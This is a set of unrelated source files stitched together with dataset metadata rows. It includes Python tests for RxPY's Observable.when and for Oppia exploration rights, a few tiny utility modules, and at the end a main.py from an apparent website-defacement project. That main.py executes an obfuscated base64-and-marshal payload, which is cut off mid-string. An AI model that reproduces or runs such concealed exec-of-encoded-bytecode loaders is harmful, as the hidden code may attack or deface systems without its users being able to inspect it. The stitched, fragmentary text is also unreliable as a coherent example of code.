        # rejected.
        with self.assertRaisesRegexp(Exception, 'already the current value'):
            rights_manager.set_private_viewability(
                self.user_id_a, self.EXP_ID, False)
        with self.assertRaisesRegexp(Exception, 'cannot be changed'):
            rights_manager.set_private_viewability(
                self.user_id_b, self.EXP_ID, True)

        rights_manager.set_private_viewability(
            self.user_id_a, self.EXP_ID, True)
        self.assertTrue(
            rights_manager.Actor(self.user_id_a).can_view(self.EXP_ID))
        self.assertTrue(
            rights_manager.Actor(self.user_id_b).can_view(self.EXP_ID))

        rights_manager.set_private_viewability(
            self.user_id_a, self.EXP_ID, False)
        self.assertTrue(
            rights_manager.Actor(self.user_id_a).can_view(self.EXP_ID))
        self.assertFalse(
            rights_manager.Actor(self.user_id_b).can_view(self.EXP_ID))

        # Private viewability cannot be changed while the exploration is
        # published; it becomes changeable again after unpublishing.
        rights_manager.publish_exploration(self.user_id_a, self.EXP_ID)
        self.assertFalse(rights_manager.Actor(
            self.user_id_a).can_change_private_viewability(self.EXP_ID))

        rights_manager.unpublish_exploration(self.user_id_admin, self.EXP_ID)
        self.assertTrue(rights_manager.Actor(
            self.user_id_a).can_change_private_viewability(self.EXP_ID))
        self.assertFalse(rights_manager.Actor(
            self.user_id_b).can_change_private_viewability(self.EXP_ID))
        self.assertTrue(rights_manager.Actor(
            self.user_id_admin).can_change_private_viewability(self.EXP_ID))
| 43.153846
| 79
| 0.688627
| 1,966
| 14,025
| 4.565107
| 0.093082
| 0.08156
| 0.129248
| 0.161783
| 0.820501
| 0.791755
| 0.77493
| 0.773816
| 0.768914
| 0.768134
| 0
| 0.002353
| 0.212121
| 14,025
| 324
| 80
| 43.287037
| 0.809864
| 0.075579
| 0
| 0.702479
| 0
| 0
| 0.033326
| 0
| 0
| 0
| 0
| 0
| 0.289256
| 1
| 0.061983
| false
| 0.008264
| 0.016529
| 0
| 0.082645
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
b481e59c25ea90dcb3093e87c206809f79add5d8
| 20,981
|
py
|
Python
|
tests/test_observable/test_when.py
|
AlexMost/RxPY
|
05cb14c72806dc41e243789c05f498dede11cebd
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
tests/test_observable/test_when.py
|
AlexMost/RxPY
|
05cb14c72806dc41e243789c05f498dede11cebd
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
tests/test_observable/test_when.py
|
AlexMost/RxPY
|
05cb14c72806dc41e243789c05f498dede11cebd
|
[
"ECL-2.0",
"Apache-2.0"
] | 1
|
2021-11-04T11:13:49.000Z
|
2021-11-04T11:13:49.000Z
|
import unittest
from datetime import datetime
from rx.observable import Observable
from rx.testing import TestScheduler, ReactiveTest, is_prime
from rx.disposables import SerialDisposable
# Module-level shorthands for the ReactiveTest factory helpers, so the
# tests below can write e.g. on_next(210, 1) instead of
# ReactiveTest.on_next(210, 1).
on_next = ReactiveTest.on_next
on_completed = ReactiveTest.on_completed
on_error = ReactiveTest.on_error
subscribe = ReactiveTest.subscribe
subscribed = ReactiveTest.subscribed
disposed = ReactiveTest.disposed
created = ReactiveTest.created
class RxException(Exception):
    """Exception type raised on purpose by the tests in this module."""
# Lambdas cannot contain a ``raise`` statement, so the tests call this
# helper instead when they need a selector that throws.
def _raise(ex):
    """Raise *ex* wrapped in an RxException."""
    raise RxException(ex)
class TestWhen(unittest.TestCase):
def test_then1(self):
scheduler = TestScheduler()
xs = scheduler.create_hot_observable(
on_next(210, 1),
on_completed(220)
)
def create():
def selector(a):
return a
return Observable.when(xs.then_do(selector))
results = scheduler.start(create)
results.messages.assert_equal(
on_next(210, 1),
on_completed(220)
)
def test_then1_error(self):
ex = Exception()
scheduler = TestScheduler()
xs = scheduler.create_hot_observable(
on_error(210, ex)
)
def create():
def selector(a):
return a
return Observable.when(xs.then_do(selector))
results = scheduler.start(create)
results.messages.assert_equal(
on_error(210, ex)
)
def test_then1_throws(self):
ex = Exception()
scheduler = TestScheduler()
xs = scheduler.create_hot_observable(
on_next(210, 1),
on_completed(220)
)
def create():
def selector(a):
raise ex
return Observable.when(xs.then_do(selector))
results = scheduler.start(create)
results.messages.assert_equal(
on_error(210, ex)
)
def test_and2(self):
scheduler = TestScheduler()
N = 2
obs = []
for n in range(N):
obs.append(scheduler.create_hot_observable(on_next(210, 1), on_completed(220)))
def create():
def selector(a, b):
return a + b
return Observable.when(obs[0].and_(obs[1]).then_do(selector))
results = scheduler.start(create)
results.messages.assert_equal(
on_next(210, N),
on_completed(220)
)
def test_and2_error(self):
ex = Exception()
N = 2
for n in range(N):
scheduler = TestScheduler()
obs = []
for j in range(N):
if j == n:
obs.append(scheduler.create_hot_observable(on_error(210, ex)))
else:
obs.append(scheduler.create_hot_observable(on_next(210, 1), on_completed(220)))
def create():
def selector(a, b):
return a + b
return Observable.when(obs[0].and_(obs[1]).then_do(selector))
results = scheduler.start(create)
results.messages.assert_equal(
on_error(210, ex)
)
def test_then2_throws(self):
scheduler = TestScheduler()
ex = Exception()
obs = []
N = 2
for i in range(N):
obs.append(scheduler.create_hot_observable(on_next(210, 1), on_completed(220)))
def create():
def selector(a, b):
raise ex
return Observable.when(obs[0].and_(obs[1]).then_do(selector))
results = scheduler.start(create)
results.messages.assert_equal(
on_error(210, ex)
)
def test_and3(self):
scheduler = TestScheduler()
obs = []
N = 3
for i in range(N):
obs.append(scheduler.create_hot_observable(on_next(210, 1), on_completed(220)))
def create():
def selector(a, b, c):
return a + b + c
return Observable.when(obs[0].and_(obs[1]).and_(obs[2]).then_do(selector))
results = scheduler.start(create)
results.messages.assert_equal(
on_next(210, N),
on_completed(220)
)
def test_and3_error(self):
ex = Exception()
N = 3
for i in range(N):
scheduler = TestScheduler()
obs = []
for j in range(N):
if j == i:
obs.append(scheduler.create_hot_observable(on_error(210, ex)))
else:
obs.append(scheduler.create_hot_observable(on_next(210, 1), on_completed(220)))
def create():
def selector(a, b, c):
return a + b + c
return Observable.when(obs[0].and_(obs[1]).and_(obs[2]).then_do(selector))
results = scheduler.start(create)
results.messages.assert_equal(
on_error(210, ex)
)
def test_then3_throws(self):
ex = Exception()
N = 3
scheduler = TestScheduler()
obs = []
for i in range(N):
obs.append(scheduler.create_hot_observable(on_next(210, 1), on_completed(220)))
def create():
def selector(a, b, c):
raise ex
return Observable.when(obs[0].and_(obs[1]).and_(obs[2]).then_do(selector))
results = scheduler.start(create)
results.messages.assert_equal(
on_error(210, ex)
)
def test_and4(self):
N = 4
scheduler = TestScheduler()
obs = []
for _ in range(N):
obs.append(scheduler.create_hot_observable(on_next(210, 1), on_completed(220)))
def create():
def selector(a, b, c, d):
return a + b + c + d
return Observable.when(obs[0].and_(obs[1]).and_(obs[2]).and_(obs[3]).then_do(selector))
results = scheduler.start(create)
results.messages.assert_equal(on_next(210, N), on_completed(220))
def test_and4_error(self):
ex = 'ex'
N = 4
for i in range(N):
scheduler = TestScheduler()
obs = []
for j in range(N):
if j == i:
obs.append(scheduler.create_hot_observable(on_error(210, ex)))
else:
obs.append(scheduler.create_hot_observable(on_next(210, 1), on_completed(220)))
def create():
def selector(a, b, c, d):
return a + b + c + d
return Observable.when(obs[0].and_(obs[1]).and_(obs[2]).and_(obs[3]).then_do(selector))
results = scheduler.start(create)
results.messages.assert_equal(on_error(210, ex))
def test_then4_throws(self):
ex = 'ex'
N = 4
scheduler = TestScheduler()
obs = []
for _ in range(N):
obs.append(scheduler.create_hot_observable(on_next(210, 1), on_completed(220)))
def create():
def selector(a, b, c, d):
raise Exception(ex)
return Observable.when(obs[0].and_(obs[1]).and_(obs[2]).and_(obs[3]).then_do(selector))
results = scheduler.start(create)
results.messages.assert_equal(on_error(210, ex))
def test_and5(self):
N = 5
scheduler = TestScheduler()
obs = []
for i in range(N):
obs.append(scheduler.create_hot_observable(on_next(210, 1), on_completed(220)))
def create():
def selector(a, b, c, d, e):
return a + b + c + d + e
return Observable.when(obs[0].and_(obs[1]).and_(obs[2]).and_(obs[3]).and_(obs[4]).then_do(selector))
results = scheduler.start(create)
results.messages.assert_equal(on_next(210, N), on_completed(220))
def test_and5_error(self):
ex = 'ex'
N = 5
for i in range(N):
scheduler = TestScheduler()
obs = []
for j in range(N):
if j == i:
obs.append(scheduler.create_hot_observable(on_error(210, ex)))
else:
obs.append(scheduler.create_hot_observable(on_next(210, 1), on_completed(220)))
def create():
def selector(a, b, c, d, e):
return a + b + c + d + e
return Observable.when(obs[0].and_(obs[1]).and_(obs[2]).and_(obs[3]).and_(obs[4]).then_do(selector))
results = scheduler.start(create)
results.messages.assert_equal(on_error(210, ex))
def test_then5_throws(self):
ex = 'ex'
N = 5
scheduler = TestScheduler()
obs = []
for _ in range(N):
obs.append(scheduler.create_hot_observable(on_next(210, 1), on_completed(220)))
def create():
def selector(a, b, c, d, e):
raise Exception(ex)
return Observable.when(obs[0].and_(obs[1]).and_(obs[2]).and_(obs[3]).and_(obs[4]).then_do(selector))
results = scheduler.start(create)
results.messages.assert_equal(on_error(210, ex))
def test_and6(self):
    """and_ across 6 sources: one joined value once every source fires."""
    N = 6
    scheduler = TestScheduler()
    sources = [
        scheduler.create_hot_observable(on_next(210, 1), on_completed(220))
        for _ in range(N)
    ]

    def create():
        def selector(a, b, c, d, e, f):
            return a + b + c + d + e + f

        plan = sources[0]
        for other in sources[1:]:
            plan = plan.and_(other)
        return Observable.when(plan.then_do(selector))

    res = scheduler.start(create)
    res.messages.assert_equal(on_next(210, N), on_completed(220))
def test_and6_error(self):
    """An error in any single one of 6 sources propagates to the join."""
    ex = 'ex'
    N = 6
    for failing in range(N):
        scheduler = TestScheduler()
        sources = [
            scheduler.create_hot_observable(on_error(210, ex)) if idx == failing
            else scheduler.create_hot_observable(on_next(210, 1), on_completed(220))
            for idx in range(N)
        ]

        def create():
            def selector(a, b, c, d, e, f):
                return a + b + c + d + e + f

            plan = sources[0]
            for other in sources[1:]:
                plan = plan.and_(other)
            return Observable.when(plan.then_do(selector))

        res = scheduler.start(create)
        res.messages.assert_equal(on_error(210, ex))
def test_Then6Throws(self):
    """A throwing selector over 6 sources surfaces as on_error.

    NOTE(review): name is camelCase unlike sibling test_thenN_throws tests;
    kept as-is so the public test name is unchanged.
    """
    ex = 'ex'
    N = 6
    scheduler = TestScheduler()
    sources = [
        scheduler.create_hot_observable(on_next(210, 1), on_completed(220))
        for _ in range(N)
    ]

    def create():
        def selector(*args):
            raise Exception(ex)

        plan = sources[0]
        for other in sources[1:]:
            plan = plan.and_(other)
        return Observable.when(plan.then_do(selector))

    res = scheduler.start(create)
    res.messages.assert_equal(on_error(210, ex))
def test_and7(self):
    """and_ across 7 sources: one joined value once every source fires."""
    N = 7
    scheduler = TestScheduler()
    sources = [
        scheduler.create_hot_observable(on_next(210, 1), on_completed(220))
        for _ in range(N)
    ]

    def create():
        def selector(a, b, c, d, e, f, g):
            return a + b + c + d + e + f + g

        plan = sources[0]
        for other in sources[1:]:
            plan = plan.and_(other)
        return Observable.when(plan.then_do(selector))

    res = scheduler.start(create)
    res.messages.assert_equal(on_next(210, N), on_completed(220))
def test_and7_error(self):
    """An error in any single one of 7 sources propagates to the join."""
    ex = 'ex'
    N = 7
    for failing in range(N):
        scheduler = TestScheduler()
        sources = [
            scheduler.create_hot_observable(on_error(210, ex)) if idx == failing
            else scheduler.create_hot_observable(on_next(210, 1), on_completed(220))
            for idx in range(N)
        ]

        def create():
            def selector(a, b, c, d, e, f, g):
                return a + b + c + d + e + f + g

            plan = sources[0]
            for other in sources[1:]:
                plan = plan.and_(other)
            return Observable.when(plan.then_do(selector))

        res = scheduler.start(create)
        res.messages.assert_equal(on_error(210, ex))
def test_then7_throws(self):
    """A throwing selector over 7 sources surfaces as on_error."""
    ex = 'ex'
    N = 7
    scheduler = TestScheduler()
    sources = [
        scheduler.create_hot_observable(on_next(210, 1), on_completed(220))
        for _ in range(N)
    ]

    def create():
        def selector(*args):
            raise Exception(ex)

        plan = sources[0]
        for other in sources[1:]:
            plan = plan.and_(other)
        return Observable.when(plan.then_do(selector))

    res = scheduler.start(create)
    res.messages.assert_equal(on_error(210, ex))
def test_and8(self):
    """and_ across 8 sources: one joined value once every source fires."""
    N = 8
    scheduler = TestScheduler()
    sources = [
        scheduler.create_hot_observable(on_next(210, 1), on_completed(220))
        for _ in range(N)
    ]

    def create():
        def selector(a, b, c, d, e, f, g, h):
            return a + b + c + d + e + f + g + h

        plan = sources[0]
        for other in sources[1:]:
            plan = plan.and_(other)
        return Observable.when(plan.then_do(selector))

    res = scheduler.start(create)
    res.messages.assert_equal(on_next(210, N), on_completed(220))
def test_and8_error(self):
    """An error in any single one of 8 sources propagates to the join."""
    ex = 'ex'
    N = 8
    for failing in range(N):
        scheduler = TestScheduler()
        sources = [
            scheduler.create_hot_observable(on_error(210, ex)) if idx == failing
            else scheduler.create_hot_observable(on_next(210, 1), on_completed(220))
            for idx in range(N)
        ]

        def create():
            def selector(a, b, c, d, e, f, g, h):
                return a + b + c + d + e + f + g + h

            plan = sources[0]
            for other in sources[1:]:
                plan = plan.and_(other)
            return Observable.when(plan.then_do(selector))

        res = scheduler.start(create)
        res.messages.assert_equal(on_error(210, ex))
def test_then8_throws(self):
    """A throwing selector over 8 sources surfaces as on_error."""
    ex = 'ex'
    N = 8
    scheduler = TestScheduler()
    sources = [
        scheduler.create_hot_observable(on_next(210, 1), on_completed(220))
        for _ in range(N)
    ]

    def create():
        def selector(*args):
            raise Exception(ex)

        plan = sources[0]
        for other in sources[1:]:
            plan = plan.and_(other)
        return Observable.when(plan.then_do(selector))

    res = scheduler.start(create)
    res.messages.assert_equal(on_error(210, ex))
def test_And9(self):
    """and_ across 9 sources: one joined value once every source fires.

    NOTE(review): name is camelCase unlike sibling test_andN tests; kept
    as-is so the public test name is unchanged.
    """
    N = 9
    scheduler = TestScheduler()
    sources = [
        scheduler.create_hot_observable(on_next(210, 1), on_completed(220))
        for _ in range(N)
    ]

    def create():
        def selector(a, b, c, d, e, f, g, h, _i):
            return a + b + c + d + e + f + g + h + _i

        plan = sources[0]
        for other in sources[1:]:
            plan = plan.and_(other)
        return Observable.when(plan.then_do(selector))

    res = scheduler.start(create)
    res.messages.assert_equal(on_next(210, N), on_completed(220))
def test_and9_error(self):
    """An error in any single one of 9 sources propagates to the join."""
    ex = 'ex'
    N = 9
    for failing in range(N):
        scheduler = TestScheduler()
        sources = [
            scheduler.create_hot_observable(on_error(210, ex)) if idx == failing
            else scheduler.create_hot_observable(on_next(210, 1), on_completed(220))
            for idx in range(N)
        ]

        def create():
            def selector(a, b, c, d, e, f, g, h, _i):
                return a + b + c + d + e + f + g + h + _i

            plan = sources[0]
            for other in sources[1:]:
                plan = plan.and_(other)
            return Observable.when(plan.then_do(selector))

        res = scheduler.start(create)
        res.messages.assert_equal(on_error(210, ex))
def test_then9_throws(self):
    """A throwing selector over 9 sources surfaces as on_error."""
    ex = 'ex'
    N = 9
    scheduler = TestScheduler()
    sources = [
        scheduler.create_hot_observable(on_next(210, 1), on_completed(220))
        for _ in range(N)
    ]

    def create():
        def selector(*args):
            raise Exception(ex)

        plan = sources[0]
        for other in sources[1:]:
            plan = plan.and_(other)
        return Observable.when(plan.then_do(selector))

    res = scheduler.start(create)
    res.messages.assert_equal(on_error(210, ex))
def test_WhenMultipleDataSymmetric(self):
    """Two equal-length streams pair up value-by-value through when()."""
    scheduler = TestScheduler()
    xs = scheduler.create_hot_observable(
        on_next(210, 1), on_next(220, 2), on_next(230, 3), on_completed(240))
    ys = scheduler.create_hot_observable(
        on_next(240, 4), on_next(250, 5), on_next(260, 6), on_completed(270))

    def create():
        return Observable.when(xs.and_(ys).then_do(lambda x, y: x + y))

    res = scheduler.start(create)
    # Each pair fires when its second (later) element arrives.
    res.messages.assert_equal(
        on_next(240, 1 + 4),
        on_next(250, 2 + 5),
        on_next(260, 3 + 6),
        on_completed(270))
def test_WhenMultipleDataAsymmetric(self):
    """Uneven streams pair only as many values as the shorter provides."""
    scheduler = TestScheduler()
    xs = scheduler.create_hot_observable(
        on_next(210, 1), on_next(220, 2), on_next(230, 3), on_completed(240))
    ys = scheduler.create_hot_observable(
        on_next(240, 4), on_next(250, 5), on_completed(270))

    def create():
        return Observable.when(xs.and_(ys).then_do(lambda x, y: x + y))

    res = scheduler.start(create)
    res.messages.assert_equal(
        on_next(240, 1 + 4),
        on_next(250, 2 + 5),
        on_completed(270))
def test_when_empty_empty(self):
    """Two sources that only complete yield a join that only completes."""
    scheduler = TestScheduler()
    xs = scheduler.create_hot_observable(on_completed(240))
    ys = scheduler.create_hot_observable(on_completed(270))

    def create():
        return Observable.when(xs.and_(ys).then_do(lambda x, y: x + y))

    res = scheduler.start(create)
    res.messages.assert_equal(on_completed(270))
def test_when_never_never(self):
    """Two never-firing sources produce a join with no messages at all."""
    scheduler = TestScheduler()
    xs = Observable.never()
    ys = Observable.never()

    def create():
        return Observable.when(xs.and_(ys).then_do(lambda x, y: x + y))

    res = scheduler.start(create)
    res.messages.assert_equal()
def test_when_throw_non_empty(self):
    """An erroring source makes the whole join error."""
    ex = 'ex'
    scheduler = TestScheduler()
    xs = scheduler.create_hot_observable(on_error(240, ex))
    ys = scheduler.create_hot_observable(on_completed(270))

    def create():
        return Observable.when(xs.and_(ys).then_do(lambda x, y: x + y))

    res = scheduler.start(create)
    res.messages.assert_equal(on_error(240, ex))
def test_complicated_when(self):
    """Three overlapping plans over three streams fire as patterns complete."""
    scheduler = TestScheduler()
    xs = scheduler.create_hot_observable(
        on_next(210, 1), on_next(220, 2), on_next(230, 3), on_completed(240))
    ys = scheduler.create_hot_observable(
        on_next(240, 4), on_next(250, 5), on_next(260, 6), on_completed(270))
    zs = scheduler.create_hot_observable(
        on_next(220, 7), on_next(230, 8), on_next(240, 9), on_completed(300))

    def create():
        return Observable.when(
            xs.and_(ys).then_do(lambda x, y: x + y),
            xs.and_(zs).then_do(lambda x, z: x * z),
            ys.and_(zs).then_do(lambda y, z: y - z),
        )

    res = scheduler.start(create)
    res.messages.assert_equal(
        on_next(220, 1 * 7),
        on_next(230, 2 * 8),
        on_next(240, 3 + 4),
        on_next(250, 5 - 9),
        on_completed(300))
# Allow running this test module directly from the command line.
if __name__ == '__main__':
    unittest.main()
| 32.528682
| 168
| 0.54454
| 2,674
| 20,981
| 4.084144
| 0.046746
| 0.059335
| 0.075817
| 0.117938
| 0.892775
| 0.866404
| 0.858346
| 0.85798
| 0.852761
| 0.840491
| 0
| 0.048152
| 0.326915
| 20,981
| 644
| 169
| 32.579193
| 0.725181
| 0.002526
| 0
| 0.822485
| 0
| 0
| 0.001625
| 0
| 0
| 0
| 0
| 0
| 0.065089
| 1
| 0.201183
| false
| 0.001972
| 0.009862
| 0.051282
| 0.331361
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
c33b56fc6f943edcabd3fb042d53877a7c42f3e3
| 135
|
py
|
Python
|
katas/kyu_8/find_the_position.py
|
the-zebulan/CodeWars
|
1eafd1247d60955a5dfb63e4882e8ce86019f43a
|
[
"MIT"
] | 40
|
2016-03-09T12:26:20.000Z
|
2022-03-23T08:44:51.000Z
|
katas/kyu_8/find_the_position.py
|
akalynych/CodeWars
|
1eafd1247d60955a5dfb63e4882e8ce86019f43a
|
[
"MIT"
] | null | null | null |
katas/kyu_8/find_the_position.py
|
akalynych/CodeWars
|
1eafd1247d60955a5dfb63e4882e8ce86019f43a
|
[
"MIT"
] | 36
|
2016-11-07T19:59:58.000Z
|
2022-03-31T11:18:27.000Z
|
from string import ascii_lowercase
def position(char):
    """Return a message giving the 1-based alphabet position of *char*.

    *char* must be a lowercase ASCII letter; anything else raises ValueError
    (from ``str.index``).
    """
    rank = ascii_lowercase.index(char) + 1
    return 'Position of alphabet: {}'.format(rank)
| 22.5
| 77
| 0.748148
| 18
| 135
| 5.5
| 0.777778
| 0.282828
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.008621
| 0.140741
| 135
| 5
| 78
| 27
| 0.844828
| 0
| 0
| 0
| 0
| 0
| 0.177778
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
c3401e30f8d995f7d558d6f99789dc9afcbea3fc
| 202
|
py
|
Python
|
creational/factory_method/data/parcel.py
|
Kozak24/Patterns
|
351d5c11f7c64ce5d58db37b6715fc8f7d31945a
|
[
"MIT"
] | null | null | null |
creational/factory_method/data/parcel.py
|
Kozak24/Patterns
|
351d5c11f7c64ce5d58db37b6715fc8f7d31945a
|
[
"MIT"
] | null | null | null |
creational/factory_method/data/parcel.py
|
Kozak24/Patterns
|
351d5c11f7c64ce5d58db37b6715fc8f7d31945a
|
[
"MIT"
] | null | null | null |
class Parcel:
    """A parcel identified by an id string and carrying a weight.

    The string form of a parcel is simply its identifier.
    """

    def __init__(self, parcel_id: str, weight: float) -> None:
        # Plain value object: store both attributes as given.
        self.parcel_id = parcel_id
        self.weight = weight

    def __str__(self) -> str:
        return self.parcel_id
| 25.25
| 62
| 0.628713
| 27
| 202
| 4.259259
| 0.407407
| 0.278261
| 0.313043
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.272277
| 202
| 7
| 63
| 28.857143
| 0.782313
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0
| 0.166667
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
c358c9827fd52ca6234d44b241c701e5e27aec3c
| 27
|
py
|
Python
|
another_talib/supportandresistance.py
|
marianobilli/another-talib
|
33c377f4da7033f0093fbc5eb7d7118d0b2b964e
|
[
"MIT"
] | null | null | null |
another_talib/supportandresistance.py
|
marianobilli/another-talib
|
33c377f4da7033f0093fbc5eb7d7118d0b2b964e
|
[
"MIT"
] | null | null | null |
another_talib/supportandresistance.py
|
marianobilli/another-talib
|
33c377f4da7033f0093fbc5eb7d7118d0b2b964e
|
[
"MIT"
] | null | null | null |
def demo():
    """Placeholder hook; always reports success."""
    return True
| 13.5
| 15
| 0.62963
| 4
| 27
| 4.25
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.259259
| 27
| 2
| 15
| 13.5
| 0.85
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.5
| true
| 0
| 0
| 0.5
| 1
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
6f0688e199955aa677b17d46c60767e34cdfc7fb
| 38
|
py
|
Python
|
public/views/__init__.py
|
cmisid/Wasty-Database
|
c2e350e3be2cb60df87c9a1481e5da3342c6b73b
|
[
"Apache-2.0"
] | null | null | null |
public/views/__init__.py
|
cmisid/Wasty-Database
|
c2e350e3be2cb60df87c9a1481e5da3342c6b73b
|
[
"Apache-2.0"
] | null | null | null |
public/views/__init__.py
|
cmisid/Wasty-Database
|
c2e350e3be2cb60df87c9a1481e5da3342c6b73b
|
[
"Apache-2.0"
] | null | null | null |
from . import base
from . import rest
| 12.666667
| 18
| 0.736842
| 6
| 38
| 4.666667
| 0.666667
| 0.714286
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.210526
| 38
| 2
| 19
| 19
| 0.933333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
6f2804e36f7619d7f0f84ccf68602b3aa50df946
| 5,288
|
py
|
Python
|
main.py
|
zaypaihtet/ZPH-DEFACE
|
d19f674931168779caa4cbfc3fb6c9185ca48d89
|
[
"MIT"
] | null | null | null |
main.py
|
zaypaihtet/ZPH-DEFACE
|
d19f674931168779caa4cbfc3fb6c9185ca48d89
|
[
"MIT"
] | null | null | null |
main.py
|
zaypaihtet/ZPH-DEFACE
|
d19f674931168779caa4cbfc3fb6c9185ca48d89
|
[
"MIT"
] | null | null | null |
# Encrypted with Crypton
# Created by OVERDOSIS
# SECURITY WARNING: the exec(marshal.loads(base64.b64decode(...))) call below
# runs an opaque, obfuscated payload that cannot be audited from source.
# Do not execute this file without decompiling and reviewing the payload first.
import base64
import marshal
exec(marshal.loads(base64.b64decode("YwAAAAAAAAAABQAAAEAAAABzmQAAAHkoAGQAAGQBAGwAAFoAAGQAAGQBAGwBAFoCAGQAAGQBAGwDAFoDAFduGwAEZQQAawoAckUAAQEBZQUAZAIAgwEAAW4BAFhkAwBaBgBkBABaBwBkBQBaCABkBgBaCQBkBwCEAABaCgBkCABkCQCEAQBaCwBkCgCEAABaDABlDQBkCwBrAgBylQBlDABlBgCDAQABbgAAZAEAUygMAAAAaf////9OcyIAAABpbnN0YWxsIHJlcXVlc3RzIGFuZCB0cnkgYWdhaW4gLi4uc8MHAAAKIOKWiOKWiOKWiOKWiOKWiOKWiOKWiOKVl+KWiOKWiOKWiOKWiOKWiOKWiOKVl+KWiOKWiOKVlyAg4paI4paI4pWXICAgICDilojilojilojilojilojilZcg4paI4paI4pWXICAg4paI4paI4pWX4paI4paI4paI4paI4paI4paI4paI4paI4pWXIOKWiOKWiOKWiOKWiOKWiOKWiOKVlyAgICAgCuKVmuKVkOKVkOKWiOKWiOKWiOKVlOKVneKWiOKWiOKVlOKVkOKVkOKWiOKWiOKVl+KWiOKWiOKVkSAg4paI4paI4pWRICAgIOKWiOKWiOKVlOKVkOKVkOKWiOKWiOKVl+KWiOKWiOKVkSAgIOKWiOKWiOKVkeKVmuKVkOKVkOKWiOKWiOKVlOKVkOKVkOKVneKWiOKWiOKVlOKVkOKVkOKVkOKWiOKWiOKVlyAgICAKICDilojilojilojilZTilZ0g4paI4paI4paI4paI4paI4paI4pWU4pWd4paI4paI4paI4paI4paI4paI4paI4pWRICAgIOKWiOKWiOKWiOKWiOKWiOKWiOKWiOKVkeKWiOKWiOKVkSAgIOKWiOKWiOKVkSAgIOKWiOKWiOKVkSAgIOKWiOKWiOKVkSAgIOKWiOKWiOKVkSAgICAKIOKWiOKWiOKWiOKVlOKVnSAg4paI4paI4pWU4pWQ4pWQ4pWQ4pWdIOKWiOKWiOKVlOKVkOKVkOKWiOKWiOKVkSAgICDilojilojilZTilZDilZDilojilojilZHilojilojilZEgICDilojilojilZEgICDilojilojilZEgICDilojilojilZEgICDilojilojilZEgICAgCuKWiOKWiOKWiOKWiOKWiOKWiOKWiOKVl+KWiOKWiOKVkSAgICAg4paI4paI4pWRICDilojilojilZEgICAg4paI4paI4pWRICDilojilojilZHilZrilojilojilojilojilojilojilZTilZ0gICDilojilojilZEgICDilZrilojilojilojilojilojilojilZTilZ0gICAgCuKVmuKVkOKVkOKVkOKVkOKVkOKVkOKVneKVmuKVkOKVnSAgICAg4pWa4pWQ4pWdICDilZrilZDilZ0gICAg4pWa4pWQ4pWdICDilZrilZDilZ0g4pWa4pWQ4pWQ4pWQ4pWQ4pWQ4pWdICAgIOKVmuKVkOKVnSAgICDilZrilZDilZDilZDilZDilZDilZ0gICAgIAogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgCiAgICAgICAg4paI4paI4paI4paI4paI4paI4pWXIOKWiOKWiOKWiOKWiOKWiOKWiOKWiOKVl+KWiOKWiOKWiOKWiOKWiOKWiOKWiOKVlyDilojilojilojilojilojilZcgIOKWiOKWiOKWiOKWiOKWiOKWiOKVl+KWiOKWiOKWiOKWiOKWiOKWiOKWiOKVlyAgICAgICAgICAgCiAgICAgICAg4paI4paI4pWU4pWQ4pWQ4paI4paI4pWX4paI4paI4pWU4pWQ4pWQ4pWQ4pWQ4pWd4paI4pa
